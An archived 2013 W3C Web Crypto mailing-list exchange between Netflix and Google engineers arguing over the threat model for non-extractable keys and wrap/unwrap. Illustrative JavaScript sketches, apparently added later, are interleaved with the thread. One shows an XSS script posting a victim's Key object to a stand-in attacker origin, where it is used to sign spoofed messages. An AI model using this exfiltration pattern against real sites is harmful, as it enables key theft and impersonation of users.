- From: Mark Watson <watsonm@netflix.com>
- Date: Mon, 6 May 2013 10:25:26 -0700
- To: Ryan Sleevi <sleevi@google.com>
- Cc: "public-webcrypto@w3.org" <public-webcrypto@w3.org>
- Message-ID: <CAEnTvdBnmmwEd_MH-0N3Z2WHMV=Nb14_y8WWjSjDK1yBOjssaw@mail.gmail.com>
On Mon, May 6, 2013 at 9:46 AM, Ryan Sleevi <sleevi@google.com> wrote:

> On Mon, May 6, 2013 at 8:46 AM, Mark Watson <watsonm@netflix.com> wrote:
> > Sent from my iPhone
> >
> > On Apr 29, 2013, at 5:24 PM, Ryan Sleevi <sleevi@google.com> wrote:
> >
> >> On Sat, Apr 27, 2013 at 6:40 AM, Mark Watson <watsonm@netflix.com> wrote:
> >>>
> >>> On Fri, Apr 26, 2013 at 6:01 PM, Ryan Sleevi <sleevi@google.com> wrote:
> >> <snip>
> >>>> Is this a good summary of our disagreement?
> >>>
> >>> Let's discuss on our next call, after I get back.
> >>>
> >>> I believe the above is roughly correct about the point of disagreement, but to fully understand your position I need to understand how the extractable flag fits into your view of the situation. How is that valuable if there is no boundary at all between JS and UA for the purposes of this API?
> >>
> >> Right, and this represents my general unease with 'extractable' at all - in what situation DOES it make sense?
> >>
> >> It feels very meaningless today already, in the presence of structured clone + inter-origin postMessage. In such a scenario, you don't even have to worry about extractability - an XSS attacker can just clone the object into their own attacker-controlled origin, which they can then use to potentially spoof messages from a UA.
> >
> > OK, so I don't see how you draw a line between extractable and wrap/unwrap then. If one is meaningless, so is the other, and vice versa.
> >
> > If the group agrees with your position, I think we must remove the extractable attribute.
> >
> >>> I agree that there are situations where the UA/JS boundary is unimportant and situations where it is significant, but I don't agree that the difference is tied fundamentally to the presence or absence of pre-provisioned keys. Of course pre-provisioned keys make a big difference, but from a practical security engineering standpoint the JS and the UA are different in all cases. They are subject to different attacks. They have different security properties. If we make a fundamental assumption that they are the same (for this API), we are pre-judging the security engineers who will actually use this API. That's not our job. Unless we have a mathematical reason to believe that there is no boundary of interest here, the people who will decide whether it matters to their application are the engineers using the API.
> >>>
> >>> ...Mark
> >>>
> >>> PS: I didn't answer your other points above only because I am going on vacation. I'll get back to you on those.
> >>
> >> Naturally, I disagree with this :-)
> >>
> >> I think it's important to model our API after the existing separations that exist in the web platform - that is, at the origin level. I realize that for sysapps/"extensions", there may be a greater opportunity to model boundaries, but I think any attempt to treat the boundary between the UA and the JS it executes as a security boundary is, in many ways, doomed to failure. You'll recall this is one of the many criticisms pointed out by the "web crypto haters" - and rightfully so, as attempts to somehow redefine that boundary "securely", but in isolation of this API alone, are exercises in hubris.
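To make the structured clone + inter-origin postMessage scenario Ryan raises above concrete, here is a rough sketch. The attacker origin, the victimKey variable, and the reliance on Key objects being structured-cloneable across origins (as later standardized) are all assumptions for illustration, not part of the original discussion.

```js
// Rough sketch of the attack scenario described above. Assumptions:
// a hypothetical victimKey variable already held by the page, an
// attacker-controlled origin, and Key objects being structured-cloneable
// via postMessage as later standardized. Load/handshake timing is omitted.

// --- script injected into the victim origin via XSS ---
const win = window.open("https://attacker.example/collect.html"); // hypothetical attacker page
win.postMessage(victimKey, "https://attacker.example"); // the Key object is structured-cloned

// --- https://attacker.example/collect.html ---
window.addEventListener("message", async (event) => {
  const stolenKey = event.data; // a usable Key object, now in the attacker's origin
  // The attacker can exercise the key's allowed usages at will, e.g. sign
  // messages that appear to come from the victim's UA.
  const sig = await crypto.subtle.sign("HMAC", stolenKey, new TextEncoder().encode("spoofed"));
});
```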
> >> Rather than discussing specific API proposals, I almost think this should be an exercise for the WG to reach consensus by modelling attack scenarios (ideally, those against use cases reflected in our use cases document) and reaching consensus as to which attacks are and are not in scope. If we're in agreement that attacks X, Y, and Z are all in scope, and are unaddressed by the API, then we have a reasonable point for discussions on mitigation - whether it be changes in how structured clone behaves, in how export behaves, or in how wrap/unwrap SHOULD work.
> >>
> >> This gets to the core of our disagreement - whether and how much XSS (persistent or reflective) should be in scope for the threat model, when it is already so far out of scope for every API today (including those that require permissions - such as video, geolocation, etc.).
> >>
> >> If you'll notice, the position I'm arguing for is that, as far as normative requirements go, we should provide the LEAST amount of guarantees, unless it can be demonstrated that we need to provide more. I interpret (and perhaps incorrectly) your response as suggesting we should try to include MORE guarantees, because "why not" or "someone might need them" - positions as an implementer that naturally give me great pause, even when there is at least one use case requesting them.
> >
> > No, I am not suggesting normative guarantees other than straightforward requirements on the functionality of the API: a key object with extractable = false cannot be used with the 'exportKey' or 'wrapKey' methods (the API must throw an error if you try), a key object with usage 'encrypt' cannot be used with sign or verify, etc.
> >
> > Perhaps, if we are paranoid, we should specify that UAs must not provide other JS APIs that circumvent these requirements.
>
> You mean like the "Structured Clone"?

Structured Clone doesn't change the properties of the Key object (in fact, by definition it keeps them the same), so that wouldn't provide a way to export or wrap a non-extractable key, or to use a key for a usage different from those specified in the Key properties. Unless I have very badly misunderstood structured clone.

What I mean is that a UA must not provide additional methods that don't respect the Key attributes - for example, if a UA provided an exportKeySpecial() method that just ignored the extractable attribute.

> It's easy to put forward straightforward requirements like you have - but if they aren't consistent with the threat they claim to be preventing, what's their value?
>
> It's a simple argument: If "extractable = false" is meant to prevent key material from leaking past the origin/UA boundary

It's meant to prevent key material from leaking from the UA to the JS. Cross-origin leakage of information is a separate issue.

> , then having "Structured Clone" for Key objects handily defeats that - an XSS to a site can export the Key object via postMessage to an origin under the attacker's control, from which they've now elevated it into a "persistent signing oracle".

As I said, cross-origin leakage of information is a separate issue.
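For concreteness, here is a minimal sketch of the two checks Mark describes above: extractable gating export, and usages gating operations. It is written against the promise-based crypto.subtle shape that was eventually standardized, not the 2013 editor's draft, so the exact method signatures are assumptions for illustration only.

```js
// Minimal illustrative sketch of the checks described above, using the
// promise-based crypto.subtle API as later standardized (not the 2013
// editor's draft); shapes here are assumptions for illustration.
async function demoKeyRestrictions() {
  // Generate a non-extractable HMAC key that may only be used to sign.
  const key = await crypto.subtle.generateKey(
    { name: "HMAC", hash: "SHA-256" },
    /* extractable */ false,
    /* usages */ ["sign"]
  );

  // extractable = false: exportKey must fail rather than reveal key material.
  try {
    await crypto.subtle.exportKey("raw", key);
  } catch (e) {
    console.log("exportKey rejected:", e.name); // InvalidAccessError
  }

  // usages = ["sign"]: the same key cannot be used with verify.
  try {
    await crypto.subtle.verify(
      "HMAC",
      key,
      new Uint8Array(32),  // purported signature
      new Uint8Array([1])  // data
    );
  } catch (e) {
    console.log("verify rejected:", e.name); // InvalidAccessError
  }
}
```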
Having access to the Key object is also different from having access to the secret material in the Key: if you have the Key object then yes, you have an oracle that can use that key for its allowed usages, and you could expose that as a service - but only to the network the device is connected to, for as long as the device is connected and your JS is loaded, subject to the policies and restrictions of any NAT it is behind, and within the capacity of that device and its network connection. If you have the secret material, you can send it to a server of your choice, which can use it without any of those restrictions. It's very different.

> If THAT is not your threat model, then please be clear about what is.
>
> You can't simply say "The JS is outside the boundary," but then have the entire API driven by the JS, without actually exploring what it is you're trying to protect.
>
> Is it the key material [as you have suggested]?

Yes, it's the key material.

> Is it the act of signing [as Mountie, Karen, and Nick have suggested]?
> Is it something else, gated on some other capability?
>
> > My point is that the security significance of the boundary between UA and JS - the boundary across which our API calls are made - is an application-specific security engineering question. Given a reasonable use-case, we can reasonably include support for features which are meaningful only when this boundary has some security significance (such as extractable and wrap/unwrap).
> >
> > You accept that, given pre-provisioned keys, the boundary is significant. There are other ways (outside the scope of this specification) that an application may gain some kind of confidence in the UA - to a greater or lesser extent. None of this is black-and-white, especially when the risk is low. For example, theft-of-service is something we care about at Netflix, but theft of a $7.99 service is not the same as forging of a $7.99M Internet banking transaction.
> >
> > You are free to argue that our use-case is unreasonable, though I am not sure to what extent it is the role of this group to subject use-cases to detailed security analysis. We know that this API can be used to build stuff that is not secure - we're not designing something that guarantees the security of all applications which use it - but of course we should not provide primitives that can never be secure. It sounds like this is your position on extractable/wrap/unwrap for all values of 'secure' absent pre-provisioned keys. This is where we disagree.
>
> We're in the security area - every use case MUST be subject to detailed security analysis to figure out what exactly makes sense, what the threats are, and what the guarantees are - especially when designing a generic API that will be used by a variety of applications.
>
> Because of this generalization, it's vitally important to be very clear about what guarantees are made, what the threats are, and what the mitigations are. You seem to be arguing that this particular API should do something to try to mitigate a particular set of threats. It's entirely reasonable to question whether or not those mitigations can or should be provided elsewhere / through other APIs, and to question the validity of the threats in a holistic sense to see whether or not it makes sense for them to be dealt with per-API.
>
> We have a dedicated WG for dealing with these issues, so let's not put the cart before the horse when designing the API.
>
> To put it differently, much like the use cases presented at the F2F for Korean Banking, I'm trying to distill what the core requirements of this particular use case are, and where the web platform falls short, so that we can look at actually addressing the root needs, rather than provide a particular, implementation-specific API.

In this case I think it comes down to a rather simple question: do we think there is value in avoiding leakage of secret key information from the UA to the JS?

It seems to be accepted that in the case of a security model with strong service trust in the UA - for example, using pre-provisioned keys - there is value in this. The remaining question is whether there is value in other cases, specifically without pre-provisioned keys. My point is that there are many other ways to establish (potentially weaker) security models in which the UA and the JS are not equally trusted by the service. And it's obvious that the UA and the JS are not equally trusted by the user. This seems to be ample justification for introducing functions common in other crypto APIs - such as PKCS11 - that control the transfer of keying material across the API boundary. The extractable attribute is the simplest of these, and wrap/unwrap are essentially extensions of that concept to key delivery. We're providing a toolkit - it is not necessary to examine the structural integrity of my design for a chair to conclude that it would be useful to have a hammer.

Having said that, the analysis for our use-case is not that hard. First, we would like to establish keys that will be used for ongoing secure communication between the client and our servers. A number of attacks against our service are possible if someone obtains these keys (you will just have to accept this, but it should be obvious merely from the fact that we choose to use cryptography here at all), so the objective is that only the User to whom the keys were issued (and their Agent) should have access to the keying material. We believe that our client JS may be subject to attacks in ways that the UA code is not. We consider an attack that gives access to an oracle, tied to a particular UA, to be much less problematic than an attack which gives access to the keys themselves (for some of the reasons explained above). Finally, we understand that hiding these keys from the JS may sometimes only be possible in a TOFU fashion, as outlined in my other mail, and we still believe this is useful.

You may ask: what attacks, exactly, is the JS subject to that the UA is not? I could enumerate some, but there is a sufficient difference between the JS and the UA to be concerned about things we have not yet thought of. Basically, we consider it much more likely that dynamically downloaded, interpreted source code may be subject to malicious modification than pre-compiled installed binaries. The entire web security model is predicated on the assumption that the user should trust their Agent more than they trust web sites. If the user is justified in making this distinction, so are we.

...Mark

> >
> > Let's discuss it on the call.
> >
> > ...Mark
>
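As an illustration of the "wrap/unwrap as an extension of extractable to key delivery" point made above, here is a sketch using the unwrapKey shape that was eventually standardized; wrap/unwrap were still only a proposal at the time of this thread, and the function name, parameters, and server-side wrapping algorithm shown are assumptions.

```js
// Illustrative sketch only: uses the unwrapKey signature as later
// standardized; at the time of this thread wrap/unwrap were a proposal.
// A content key arrives from the server wrapped under an already
// established wrapping key and is unwrapped directly into a
// non-extractable Key object, so its raw bytes never pass through JS.
async function receiveContentKey(wrappingKey, wrappedKeyBytes) {
  return crypto.subtle.unwrapKey(
    "raw",                    // format of the key inside the wrapping
    wrappedKeyBytes,          // ArrayBuffer received from the server
    wrappingKey,              // CryptoKey carrying the "unwrapKey" usage
    { name: "AES-KW" },       // algorithm the server used to wrap (assumed)
    { name: "AES-GCM" },      // algorithm the unwrapped key will be used with
    /* extractable */ false,  // the page's JS never sees the key material
    ["decrypt"]               // allowed usages of the unwrapped key
  );
}
```

Combined with extractable = false, a later exportKey on the result fails in the same way as in the earlier sketch, which is the boundary the extractable attribute is meant to police.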
Received on Monday, 6 May 2013 17:25:59 UTC